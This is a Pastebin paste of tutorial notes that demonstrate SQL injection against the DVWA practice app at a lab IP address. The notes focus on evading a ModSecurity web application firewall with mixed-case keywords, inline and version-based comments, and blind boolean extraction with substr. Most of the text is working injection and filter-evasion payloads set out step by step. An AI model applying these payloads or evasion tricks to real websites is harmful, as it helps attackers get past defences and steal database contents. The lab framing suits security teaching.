Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Bypassing MOD_SECURITY
- ======================
- Bypassing WAF Validations and Filterations
- ------------------------------------------
- Step 1: Attacking Union Based Injection of WAF based website.(*note open the ip address of the waf)
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1
- Step 2: Produce an error(By adding an extra single quote)
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1'
- Step 3: Lets try to get the total number of columns from the respective table of the url.
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 1--+
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 2--+
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' order by 3--+
- or in the input field 1' order by 1#,1' order by 2#,order by 3#.
- Step 4: Now when you know about the number of columns you can use union select statement to find out vulnerable columns
- http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+
- or
- for the input field 1' union select 1,2#
- As you can see we are being blocked by the firewall. Lets understand how it was happened.
- Here we used union which was placed in the database as the malicious input which should not come from a user. As this request received by the web server its passed on to WAF in WAF it is compared with the blacklist database and as it matched with union inside the database it was blocked.
- union --->Web Server -->MOd Security (List of malicious input word which includes union)---> X Blocked.
- Bypassing Technique 1
- Upper Lower Case Change
- 1. Upper Lower Case Method
- union all select : UnIoN aLl SeLeCt
- in the input field add the following
- 1' uNiOn sEleCt 1,2#
- The above statement would not work
- 1' /*!union*/ /*!select*/ 1,2#
- Inline Comments : /*! */
- Technique Number two : Inline Executable Comments
- 1' /*!union*/ /*!select*/ 1,2#
- Step 2: 1' /*!union*/ /*!select*/ 1,/*!table_name*/ from /*!information_schema.tables*/#
- Target Table is users
- Technique number 3: Version Based Inline Executable Comments
- ------------------------------------------------------------
- /*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/
- MYSQL Versions
- 5.00.00 --> 50000
- 4.00.00 --> 40000
- 3.00.00 --> 30000
- 2.00.00 --> 20000
- 1.00.00 --> 10000
- Step 3:
- 1' /*!50000union*/ /*!50000select*/ 1,/*!50000table_name*/ from /*!50000information_schema.tables*/#
- Blind SQL Injection
- -------------------
- Blind SQL injection is a type of sql injection attack that ask the database true or false questions and determine the answer based on the application response.
- This attack is often used when the web application is configured to show generic error message, but has not mitigated the code that is vulnerable to SQLi.
- This type of sql injection is identical to normal sql injection, the only is the data retreived from the database.
- 1. Blind Boolean
- 2. Time Based SQL Injection
- Demo
- -----
- Step 3: As you can see if we get output as
- 1' and 1=0 # ---> False
- 1' and 1=1 # ---> True
- 1' and 1=0 order by 1 # --> No Result ---> Generic error
- 1' and 1=1 order by 1 # --> Result --> normal result
- 1' and 1=0 order by 2 # --> No result
- so we can execute our statements e.g
- Steps
- Step 1:
- 1' and 1=1 order by 1 # --data
- 1' and 1=1 order by 2 # --data
- 1' and 1=1 order by 3 # --no data at this point you have to realise only two columns are present
- Then you can go on executing union select statements
- Step 2:
- 1' and 1=1 union select 1,2#
- Substring and Blind boolean injection
- -----------
- we know that hacker would be able to ask some true false question and database will show answer in 0 and 1 so we would use substring here,substr is a function in sql that brings the charater values and we are basically asking is the condition true or false.
- version() gives the version
- version is 10.1.34-MariaDB
- substr(version(),1,1)=1#
- substr(version(),index,position from that index)
- so the above statement would check if at index position and would only select the character/number at index 1, At index number 1 '1' is present so if the condition provided is true/false it would give the answer in 0/1.
- index 1->1
- index 2->0
- index 3->.
- index 4->1
- index 5->.
- step 3: 1' and 1=1 union select 1,substr(version(),1,1)=1#
- answer 1 as the above condition is true
- similarly we can also ask something like
- 1' and 1=1 union select 1,substr(version(),3,1)='.'#
- The above statement means go to version check at index number 3 if the value there is equal to '.'.Version is 10.1.34-MariaDB and at index 3 there is a dot .so the above condition is true database will answer 1.
- Drive Link
- https://drive.google.com/file/d/19umEKD0TfKwTbPL16RaTlyz0dMskINDb/view?usp=sharing
Add Comment
Please, Sign In to add comment